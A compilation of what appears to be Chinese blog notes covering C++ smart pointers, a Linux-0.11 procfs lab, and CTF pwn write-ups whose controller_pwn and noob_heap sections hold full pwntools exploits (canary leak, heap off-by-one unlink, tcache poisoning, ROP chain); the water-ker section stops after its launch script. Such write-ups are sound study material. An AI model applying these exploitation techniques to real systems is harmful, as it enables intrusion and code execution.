std::auto_ptr<Auto>::~auto_ptr(v8); /* auto_ptr的析构函数 */
  • auto_ptr 的析构函数中会自动释放 Auto(传入对象):
1
2
3
4
5
6
7
8
9
10
11
void __fastcall std::auto_ptr<Auto>::~auto_ptr(Auto **a1)
{
Auto *v1; // rbx

v1 = *a1;
if ( *a1 )
{
Auto::~Auto(*a1);
operator delete(v1, 8uLL);
}
}
  • auto_ptr 创建的对象仍然具有指针的性质,其原因是 auto_ptr*-> 等符号进行了重构
1
2
3
4
__int64 __fastcall std::auto_ptr<Auto>::operator*(__int64 a1)
{
return *(_QWORD *)a1;
}
1
2
3
4
__int64 __fastcall std::auto_ptr<Auto>::operator->(__int64 a1)
{
return *(_QWORD *)a1;
}
  • PS:对于 *-> 的重构只是实现了解引用而已,不负责具体的偏移

unique_ptr

unique_ptrauto_ptr 的用法几乎一样,另外添加了如下几个特性:

  • 基于排他所有权模式:两个指针不能指向同一个资源
  • 无法进行左值 unique_ptr 复制构造,也无法进行左值复制赋值操作,但允许临时右值赋值构造和赋值
  • 在 STL 容器中使用 unique_ptr,不允许直接赋值
  • 支持对象数组的内存管理
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <iostream>
#include <memory>
using namespace std;

int main(){
unique_ptr<string> p1(new string("11111111"));
unique_ptr<string> p2(new string("22222222"));

//p1 = p2; // 禁止左值赋值
//unique_ptr<string> p3(p2); // 禁止左值赋值构造

cout << "p1:" << p1.get() << endl;
cout << "p2:" << p2.get() << endl;

unique_ptr<string> p3(std::move(p2));
p2 = std::move(p1); // 使用move把左值转成右值就可以赋值了,效果和auto_ptr赋值一样

cout << "-------------------" << endl;
cout << "p1:" << p1.get() << endl;
cout << "p2:" << p2.get() << endl;
cout << "p3:" << p3.get() << endl;
}
1
2
3
4
5
6
p1:0x559625bfdeb0
p2:0x559625bfdee0
-------------------
p1:0
p2:0x559625bfdeb0
p3:0x559625bfdee0

IDA 分析如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 std::allocator<char>::allocator(v27, argv, envp);
v23 = (void *)operator new(0x20uLL);
std::string::basic_string<std::allocator<char>>(v23, "11111111", v27);
std::unique_ptr<std::string>::unique_ptr<std::default_delete<std::string>,void>(v25, v23); /* unique_ptr的构造函数 */
std::allocator<char>::~allocator(v27);
std::allocator<char>::allocator(v27, v23, v3);
v24 = (void *)operator new(0x20uLL);
std::string::basic_string<std::allocator<char>>(v24, "22222222", v27);
std::unique_ptr<std::string>::unique_ptr<std::default_delete<std::string>,void>(v26, v24); /* unique_ptr的构造函数 */
std::allocator<char>::~allocator(v27);

......

v10 = std::move<std::unique_ptr<std::string> &>(v26); /* 把左值转成右值 */
std::unique_ptr<std::string>::unique_ptr(v27, v10); /* unique_ptr的构造函数 */
v11 = std::move<std::unique_ptr<std::string> &>(v25); /* 把左值转成右值 */
std::unique_ptr<std::string>::operator=(v26, v11);

......

std::unique_ptr<std::string>::~unique_ptr(v27);
std::unique_ptr<std::string>::~unique_ptr(v26);
std::unique_ptr<std::string>::~unique_ptr(v25)

shared_ptr

shared_ptr 基于非排他所有权模式:允许多个指针指向同一个资源

  • 当复制或拷贝时,引用计数加 “1”
  • 当智能指针析构时,引用计数减 “1”
  • 如果计数为 “0”,代表已经没有指针指向这块内存,那么就释放它
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#include <iostream>
#include <memory>
using namespace std;

void deleteStr(string* p) { /* 允许自定义析构函数 */
cout << *p << endl;
}

int main(){
string* str = new string("11111111");
std::shared_ptr<string> p1(str, deleteStr);
std::shared_ptr<string> p2(p1);
std::shared_ptr<string> p3(p2);

cout << "p1 count = " << p1.use_count() << endl;
cout << "p2 count = " << p2.use_count() << endl;
cout << "p3 count = " << p3.use_count() << endl;

p1 = NULL;
p2 = NULL;

cout << "p1 count = " << p1.use_count() << endl;
cout << "p2 count = " << p2.use_count() << endl;
cout << "p3 count = " << p3.use_count() << endl;

p3 = NULL;
cout << "22222222" << endl;

return 0;
}
1
2
3
4
5
6
7
8
p1 count = 3
p2 count = 3
p3 count = 3
p1 count = 0 /* p1被置空 */
p2 count = 0 /* p2被置空 */
p3 count = 1 /* shared_ptr的计数器为"1" */
11111111 /* 当shared_ptr的计数器为"0"时,调用析构函数 */
22222222

weak_ptr

weak_ptr 是为配合 shared_ptr 而引入的一种智能指针,它只可以从一个 shared_ptr 或另一个 weak_ptr 对象构造

weak_ptr 提供的是一个弱引用:

  • 弱引用不更改引用计数,类似普通指针

shared_ptr 提供的是一个强引用:

  • 当对象被创建时,计数为 “1”,每创建一个变量引用该对象时,该对象的计数就增加“1”,当上述变量销毁时,对象的计数减 “1”,当计数为 “0” 时,这个对象也就被析构了
  • 强引用计数在很多种情况下都是可以正常工作的,但是也有不凑效的时候,当出现循环引用时,就会出现严重的问题
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <iostream>
#include <memory>
using namespace std;

class parent;
class children;
typedef shared_ptr<parent> parent_ptr;
typedef shared_ptr<children> children_ptr;
typedef weak_ptr<parent> parent_ptr2;

class parent{
public:
~parent() { std::cout <<"destroying parent\n"; }
public:
children_ptr children;
};

class children{
public:
~children() { std::cout <<"destroying children\n"; }
public:
parent_ptr parent;
};

void test(){
parent_ptr father(new parent());
children_ptr son(new children());

father->children = son;
son->parent = father;
cout << "father count = " << father.use_count() << endl;
cout << "son count = " << son.use_count() << endl;
}

int main(){
std::cout<<"begin test\n";
test();
std::cout<<"end test\n";
}
  • 由于 parentchildren 对象互相引用,它们的引用计数都是 “2”,不能自动释放
  • 并且此时这两个对象再无法访问到
1
2
3
4
begin test
father count = 2
son count = 2
end test

使用弱引用 weak_ptr 即可打破循环:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <iostream>
#include <memory>
using namespace std;

class parent;
class children;
typedef shared_ptr<parent> parent_ptr;
typedef shared_ptr<children> children_ptr;
typedef weak_ptr<parent> parent_ptr2;

class parent{
public:
~parent() { std::cout <<"destroying parent\n"; }
public:
children_ptr children;
};

class children{
public:
~children() { std::cout <<"destroying children\n"; }
public:
parent_ptr2 parent;
};

void test(){
parent_ptr father(new parent());
children_ptr son(new children());

father->children = son;
son->parent = father;
cout << "father count = " << father.use_count() << endl;
cout << "son count = " << son.use_count() << endl;
}

int main(){
std::cout<<"begin test\n";
test();
std::cout<<"end test\n";
}
1
2
3
4
5
6
begin test
father count = 1 /* 由于children使用弱指针,因此children并不会使father的计数器增加 */
son count = 2
destroying parent
destroying children
end test

HIT-OSLab8

实验目的:

  • 掌握虚拟文件系统的实现原理
  • 实践文件、目录、文件系统等概念

实验内容:

  • 在 Linux-0.11 上实现 procfs(proc文件系统) 内的 psinfo 节点,当读取此节点的内容的时候,可得到系统当前所有进程的状态信息
  • 在 Linux-0.11 上实现 procfs(proc文件系统) 内的 hdinfo 节点,当读取此节点的内容的时候,可以打印出硬盘的一些信息
  • 参考格式如下:
1
2
3
4
5
6
7
8
9
10
11
12
# cat /proc/psinfo
pid state father counter start_time
0 1 -1 0 0
1 1 0 28 1
4 1 1 1 73
3 1 1 27 63
6 0 4 12 817

# cat /proc/hdinfo
total_blocks: 62000;
free_blocks: 39037;
used_blocks: 22963;

实验过程

procfs 是一个 Linux 内核模块,它提供了一个用于访问进程信息的文件系统

  • 通过 procfs,你可以查看与进程有关的信息,如进程 ID、进程名、进程的命令行参数等
  • 它使得用户可以方便地对进程进行管理和监控

procfs 的实现依赖于内核的 proc 文件系统,它将进程信息存储在 /proc 目录下

  • 这个目录提供了一组用于访问进程信息的文件和目录
  • 通过这些文件,你可以查看进程的详细信息,如 /proc/[pid]/cmdline 文件可以查看进程的命令行参数

在开始实验前,我们需要先了解 linux 中的两个关键结构 file 和 inode

在 Linux 中,结构体 file 用于描述一个内存中的文件(打开的文件)

1
2
3
4
5
6
7
struct file {
unsigned short f_mode; /* 文件权限 */
unsigned short f_flags; /* 文件标志 */
unsigned short f_count; /* 文件计数器 */
struct m_inode * f_inode; /* 对应inode结构体 */
off_t f_pos; /* 表示文件当前位置 */
};

每种类型的文件都有一个唯一的标识符,即索引节点 inode,结构体 inode 用于描述一个在磁盘中的文件或者一个有特定功能的虚拟文件

索引节点有两种类型:

  • metadata inode 是用于存储文件元数据的 inode
    • 元数据(metadata):用来描述一个文件的特征,包含了该文件或目录的元数据,如权限、所有者、组、大小、创建时间等
  • data inode 是用于存储文件数据的 inode
    • 数据(data):泛指普通文件中的实际数据

在 linux-0.11 中似乎没有刻意去区别这两种类型的 inode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
struct d_inode {
unsigned short i_mode;
unsigned short i_uid;
unsigned long i_size;
unsigned long i_time;
unsigned char i_gid;
unsigned char i_nlinks;
unsigned short i_zone[9];
};

struct m_inode {
unsigned short i_mode; /* 文件权限 */
unsigned short i_uid; /* 文件所有者 */
unsigned long i_size; /* 文件大小 */
unsigned long i_mtime; /* 最后修改的时间 */
unsigned char i_gid; /* 文件组 */
unsigned char i_nlinks; /* 文件链接数 */
unsigned short i_zone[9]; /* 文件磁盘区域 */
/* these are in memory also */
struct task_struct * i_wait; /* 对应任务 */
unsigned long i_atime; /* 访问时间 */
unsigned long i_ctime; /* 修改时间 */
unsigned short i_dev; /* 设备号 */
unsigned short i_num; /* 文件编号 */
unsigned short i_count; /* 计数器 */
unsigned char i_lock; /* 锁标记 */
unsigned char i_dirt; /* 脏标记 */
unsigned char i_pipe; /* 管道标记 */
unsigned char i_mount; /* 挂载标记 */
unsigned char i_seek; /* 在文件读取时使用的缓冲区大小 */
unsigned char i_update; /* 在更新文件时使用的缓冲区大小 */
};

首先 proc 文件系统中包含一种特殊类型的文件,需要在 include/sys/stat.h 中进行定义:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#define S_IFMT  00170000
#define S_IFREG 0100000 /* 普通文件 */
#define S_IFBLK 0060000 /* 块设备 */
#define S_IFDIR 0040000 /* 目录 */
#define S_IFCHR 0020000 /* 字符设备 */
#define S_IFIFO 0010000 /* 管道 */

#define S_ISREG(m) (((m) & S_IFMT) == S_IFREG) /* 是否为普通文件 */
#define S_ISDIR(m) (((m) & S_IFMT) == S_IFDIR) /* 是否为目录 */
#define S_ISCHR(m) (((m) & S_IFMT) == S_IFCHR) /* 是否为字符设备 */
#define S_ISBLK(m) (((m) & S_IFMT) == S_IFBLK) /* 是否为块设备 */
#define S_ISFIFO(m) (((m) & S_IFMT) == S_IFIFO) /* 是否为管道 */

#define S_IFPROC 0030000 /* proc文件 */
#define S_ISPROC(m) (((m) & S_IFMT) == S_IFPROC) /* 是否为proc文件 */

接下来我们需要在 sys_mknod sys_read 中添加有关 proc 文件的判断,使其可以支持 proc 文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
int sys_mknod(const char * filename, int mode, int dev)
{
const char * basename;
int namelen;
struct m_inode * dir, * inode;
struct buffer_head * bh; /* 用于描述一块磁盘块缓冲区 */
struct dir_entry * de; /* 用于描述一个目录项 */

if (!suser())
return -EPERM;
if (!(dir = dir_namei(filename,&namelen,&basename))) /* 获取上层目录的inode */
return -ENOENT;
if (!namelen) {
iput(dir); /* 将一个inode从当前目录中移除 */
return -ENOENT;
}
if (!permission(dir,MAY_WRITE)) { /* 检查目录的权限 */
iput(dir);
return -EPERM;
}
bh = find_entry(&dir,basename,namelen,&de); /* 在目录中查找一个文件 */
if (bh) { /* 文件名重复 */
brelse(bh);
iput(dir);
return -EEXIST;
}
inode = new_inode(dir->i_dev); /* 分配一个新的index结构体 */
if (!inode) {
iput(dir);
return -ENOSPC;
}
inode->i_mode = mode;
if(S_ISBLK(mode) || S_ISCHR(mode) || S_ISPROC(mode))
inode->i_zone[0] = dev;
inode->i_mtime = inode->i_atime = CURRENT_TIME;
inode->i_dirt = 1;
bh = add_entry(dir,basename,namelen,&de); /* 添加一个新目录项 */
if (!bh) {
iput(dir);
inode->i_nlinks=0;
iput(inode);
return -ENOSPC;
}
de->inode = inode->i_num;
bh->b_dirt = 1;
iput(dir);
iput(inode);
brelse(bh);
return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
int sys_read(unsigned int fd,char * buf,int count)
{
struct file * file;
struct m_inode * inode;

if (fd>=NR_OPEN || count<0 || !(file=current->filp[fd]))
return -EINVAL;
if (!count)
return 0;
verify_area(buf,count);
inode = file->f_inode;
if (inode->i_pipe) /* 处理管道 */
return (file->f_mode&1)?read_pipe(inode,buf,count):-EIO;
if (S_ISPROC(inode->i_mode)) /* 处理proc文件 */
return proc_read(inode->i_zone[0],&file->f_pos,buf,count);
if (S_ISCHR(inode->i_mode)) /* 处理字符设备 */
return rw_char(READ,inode->i_zone[0],buf,count,&file->f_pos);
if (S_ISBLK(inode->i_mode)) /* 处理块设备 */
return block_read(inode->i_zone[0],&file->f_pos,buf,count);
if (S_ISDIR(inode->i_mode) || S_ISREG(inode->i_mode)) { /* 处理目录和普通文件 */
if (count+file->f_pos > inode->i_size)
count = inode->i_size - file->f_pos;
if (count<=0)
return 0;
return file_read(inode,file,buf,count);
}
printk("(Read)inode->i_mode=%06o\n\r",inode->i_mode);
return -EINVAL;
}

然后我们需要在根文件系统加载后创建 /proc 目录以及其中的 psinfo hdinfo 文件:

1
2
3
4
5
6
7
8
9
setup((void *) &drive_info); /* 挂载根文件系统 */
(void) open("/dev/tty0",O_RDWR,0); /* 创建stdin */
(void) dup(0); /* 创建stdout */
(void) dup(0); /* 创建stderr */
mkdir("/proc",0755);
mknod("/proc/psinfo",S_IFPROC|0444,0);
mknod("/proc/hdinfo",S_IFPROC|0444,1);
printf("%d buffers = %d bytes buffer space\n\r",NR_BUFFERS,
NR_BUFFERS*BLOCK_SIZE);

最后的实验操作就是实现 proc_read 函数(新建 fs/proc.c 文件):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#include <linux/kernel.h>
#include <linux/sched.h>
#include <asm/segment.h>
#include <linux/fs.h>
#include <stdarg.h>
#include <unistd.h>

#define set_bit(bitnr, addr) ({ \
register int __res ; \
__asm__("bt %2,%3;setb %%al":"=a" (__res):"a" (0),"r" (bitnr),"m" (*(addr))); \
__res; })

char proc_buf[4096] = {'\0'};

extern int vsprintf(char *buf, const char *fmt, va_list args);

int sprintf(char *buf, const char *fmt, ...){
va_list args;
int i;
va_start(args, fmt);
i = vsprintf(buf, fmt, args);
va_end(args);
return i;
}

int get_psinfo() {
int read = 0;
read += sprintf(proc_buf + read, "%s", "pid\tstate\tfather\tcounter\tstart_time\n");
struct task_struct **p;
for (p = &FIRST_TASK; p <= &LAST_TASK; ++p) /* 遍历task[NR_TASKS] */
if (*p != NULL){
read += sprintf(proc_buf + read, "%d\t", (*p)->pid);
read += sprintf(proc_buf + read, "%d\t", (*p)->state);
read += sprintf(proc_buf + read, "%d\t", (*p)->father);
read += sprintf(proc_buf + read, "%d\t", (*p)->counter);
read += sprintf(proc_buf + read, "%d\n", (*p)->start_time);
}
return read;
}

int get_hdinfo() {
int read = 0;
int i, used;
struct super_block *sb;
sb = get_super(0x301); /* 磁盘设备号:3*256+1 */
read += sprintf(proc_buf + read, "Total blocks:%d\n", sb->s_nzones);
used = 0;
i = sb->s_nzones;
while (--i >= 0){
if (set_bit(i & 8191, sb->s_zmap[i >> 13]->b_data))
used++;
}
read += sprintf(proc_buf + read, "Used blocks:%d\n", used);
read += sprintf(proc_buf + read, "Free blocks:%d\n", sb->s_nzones - used);
read += sprintf(proc_buf + read, "Total inodes:%d\n", sb->s_ninodes);
used = 0;
i = sb->s_ninodes + 1;
while (--i >= 0){
if (set_bit(i & 8191, sb->s_imap[i >> 13]->b_data))
used++;
}
read += sprintf(proc_buf + read, "Used inodes:%d\n", used);
read += sprintf(proc_buf + read, "Free inodes:%d\n", sb->s_ninodes - used);
return read;
}

int proc_read(int dev, unsigned long *pos, char *buf, int count){
int i;
if (*pos % 1024 == 0){
if (dev == 0)
get_psinfo();
if (dev == 1)
get_hdinfo();
}
for (i = 0; i < count; i++){
if (proc_buf[i + *pos] == '\0')
break;
put_fs_byte(proc_buf[i + *pos], buf + i + *pos);
}
*pos += i;
return i;
}

最后修改 fs/makefile

1
2
3
4
5
6
7
8
9
OBJS=	open.o read_write.o inode.o file_table.o buffer.o super.o \
block_dev.o char_dev.o file_dev.o stat.o exec.o pipe.o namei.o \
bitmap.o fcntl.o ioctl.o truncate.o proc.o

......

proc.o: proc.c ../include/string.h ../include/linux/sched.h \
../include/linux/head.h ../include/linux/fs.h ../include/sys/types.h \
../include/linux/mm.h ../include/signal.h ../include/linux/kernel.h

效果如下:

controller_pwn

1
2
3
4
5
6
controller_pwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=b99c4c5065054620d93caef36ed671bfc30aa74b, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

简单栈溢出:

1
2
3
4
5
fflush(_bss_start);
read(0, buf, 0x30uLL);
printf("OK,get password %s:\n", buf);
fflush(_bss_start);
read(0, buf, 0x60uLL);

有后门:

1
2
3
4
int flag()
{
return system("cat flag");
}

入侵思路

第一个溢出泄露 canary,第二个溢出覆盖返回地址为后门地址

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './controller_pwn'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.27.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('pwn-26afcd498d.challenge.xctf.org.cn','9999',ssl=True)

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x8B8)\n")
pause()

def cmd(op):
sla(">",str(op))

#debug()

sa("command","a"*0x28+"b")

ru("OK,get password")
ru("b")

leak_data = u64(p.recv(7).ljust(8,b"\x00"))
canary = leak_data * 0x100
success("leak_data >> "+hex(leak_data))
success("canary >> "+hex(canary))

sleep(0.5)
p.send(b"a"*0x28+p64(canary)+b"b"*0x8+p8(0xa))

p.interactive()

noob_heap

1
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.4) stable release version 2.35.
1
2
3
4
5
6
noob_heap1: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5017d1695b20f77ecbb13c419848ac70f4edbafc, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开
1
2
3
4
5
6
7
8
9
10
11
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x20 0x00 0x00 0x00000000 A = sys_number
0004: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0006
0005: 0x06 0x00 0x00 0x00000000 return KILL
0006: 0x15 0x00 0x01 0x00000065 if (A != ptrace) goto 0008
0007: 0x06 0x00 0x00 0x00000000 return KILL
0008: 0x15 0x00 0x01 0x0000009d if (A != prctl) goto 0010
0009: 0x06 0x00 0x00 0x00000000 return KILL
0010: 0x06 0x00 0x00 0x7fff0000 return ALLOW

漏洞分析

有 off-by-one 漏洞:

1
2
3
4
5
6
else if ( chunk_list[index] )
{
printf("Note: ");
chunk = chunk_list[index];
chunk[read(0, chunk, size_list[index])] = 0;// off-by-one
}

入侵思路

有 off-by-one 漏洞,因此需要打 unlink attack

本题目限制 chunk 大小,需要利用 scanf 中的 malloc 来触发 fast chunk 合并,得到 libc_base:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
add(0x78)
dele(0)
add(0x78)
show(0)

leak_addr = u64(p.recv(5).ljust(8,b"\x00"))*0x1000
heap_base = leak_addr
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

for i in range(32):
add(0x78)

for i in range(7):
dele(i)

for i in range(9):
dele(i+7)

cmd("1"*0x400)

for i in range(7):
add(0x78)
add(0x78)

show(7)
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x21a0f0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

这里需要利用 fast chunk 的合并机制,堆布局如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Free chunk (fastbins) | PREV_INUSE
Addr: 0x55722449c810 /* chunk1 */
Size: 0x81
fd: 0x5577736b8c0c

Free chunk (fastbins) | PREV_INUSE
Addr: 0x55722449c890 /* chunk2 */
Size: 0x81
fd: 0x55722449c

Allocated chunk | PREV_INUSE
Addr: 0x55722449c910 /* chunk3 */
Size: 0x81

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x55722449c990 /* chunk4 */
Size: 0x101
fd: 0x7fdeb0a19ce0
bk: 0x7fdeb0a19ce0
  • 通过 chunk3 覆盖 chunk4->size 的P位,同时在 chunk3 中伪造 fd,bk(为了通过 unlink 检查)
  • 使用 scanf 触发 fast chunk 合并:
    • 首先 chunk4 会进入 smallbin
    • 程序读取 chunk4->size 的P位为“0”,误以为 chunk3 是 fast chunk
    • 程序将 chunk1,chunk2,chunk3 这3个 fast chunk 合并

测试样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
for i in range(6):
add(0x78)

for i in range(7):
dele(i)

fake_heap_addr = heap_base + 0x910
payload = ""
payload += p64(fake_heap_addr+0x18)+p64(fake_heap_addr+0x20)
payload += p64(0)+p64(0)
payload += p64(fake_heap_addr)

dele(12)
dele(11)
edit(13,payload.ljust(0x70,b"\x00")+p64(0x80))
cmd("1"*0x400)

for i in range(7):
add(0x78)
add(0x78)
add(0x78)

for i in range(7):
dele(i)
dele(12)
dele(11)
cmd("1"*0x400)

由于相邻 chunk->size 的P位为“1”,需要一些堆风水才能将 chunk3 申请回来,之后就可以实现 UAF

最后劫持 tcache,先通过 environ 泄露 stack_addr,后劫持返回地址写入 ORW 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './noob_heap1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p,"")
gdb.attach(p,"b *$rebase(0x1824)\n")
pause()

def cmd(op):
if(type(op) == int):
sla(">>",str(op))
else:
sla(">>",op)

def add(size):
cmd(1)
sla("Size: ",str(size))

def dele(index):
cmd(2)
sla("Index: ",str(index))

def edit(index,data):
cmd(3)
sla("Index: ",str(index))
sa("Note: ",data)

def show(index):
cmd(4)
sla("Index: ",str(index))

add(0x78)
dele(0)
add(0x78)
show(0)

leak_addr = u64(p.recv(5).ljust(8,b"\x00"))*0x1000
heap_base = leak_addr
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

for i in range(32):
add(0x78)

for i in range(7):
dele(i)

for i in range(9):
dele(i+7)

cmd("1"*0x400)

for i in range(7):
add(0x78)
add(0x78)

show(7)
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x21a0f0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

for i in range(6):
add(0x78)

for i in range(7):
dele(i)

fake_heap_addr = heap_base + 0x910
payload = ""
payload += p64(fake_heap_addr+0x18)+p64(fake_heap_addr+0x20)
payload += p64(0)+p64(0)
payload += p64(fake_heap_addr)

dele(12)
dele(11)
edit(13,payload.ljust(0x70,b"\x00")+p64(0x80))
cmd("1"*0x400)

for i in range(7):
add(0x78)
add(0x78)
add(0x78)

for i in range(7):
dele(i)
dele(12)
dele(11)
cmd("1"*0x400)

fake_heap_addr = heap_base + 0x790
payload = ""
payload += p64(fake_heap_addr+0x18)+p64(fake_heap_addr+0x20)
payload += p64(0)+p64(0)
payload += p64(fake_heap_addr)

dele(9)
edit(10,payload.ljust(0x70,b"\x00")+p64(0x80))
cmd("1"*0x400)

for i in range(7):
add(0x78)

add(0x78)
add(0x78)
add(0x78)
add(0x78)

environ = libc_base + libc.sym['__environ']
key = (heap_base + 0x7a0) >> 12

for i in range(4):
dele(i)
dele(10)
edit(14,p64(environ ^ key))

add(0x78)
add(0x78)
show(1)
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
stack_addr = leak_addr - 0x140 - 0x8
success("leak_addr >> "+hex(leak_addr))
success("stack_addr >> "+hex(stack_addr))

pop_rdi_ret = libc_base + 0x000000000002a3e5
pop_rsi_ret = libc_base + 0x000000000002be51
pop_rdx_ret = libc_base + 0x00000000000796a2
pop_rax_ret = libc_base + 0x0000000000045eb0
open_libc = libc_base + libc.sym['open']
read_libc = libc_base + libc.sym['read']
write_libc = libc_base + libc.sym['write']

payload = "a"*0x18
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0x400)
payload += p64(read_libc)

dele(0)
edit(14,p64(stack_addr ^ key))
add(0x78)
add(0x78)

edit(4,"./flag".ljust(0x30,b"\x00"))
#debug()
edit(2,payload)

payload = b"a"*0x40
payload += p64(pop_rdi_ret) + p64(heap_base+0x3a0)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(open_libc)

payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rsi_ret) + p64(heap_base+0x3a0)
payload += p64(pop_rdx_ret) + p64(0x30)
payload += p64(read_libc)

payload += p64(pop_rdi_ret) + p64(1)
payload += p64(write_libc)
sleep(0.5)
sl(payload)

p.interactive()

water-ker

1
Linux version 6.4.0 (root@ubuntu-virtual-machine) (gcc (Ubuntu 9.4.0-1ubuntu1~23
1
2
3
4
5
6
7
8
9
10
11
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-monitor /dev/null \
-append "root=/dev/ram console=ttyS0 oops=panic quiet panic=1 kaslr" \
-cpu kvm64,+smep,+smap\
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
-no-reboot
  • smep,smap,kaslr
1
2
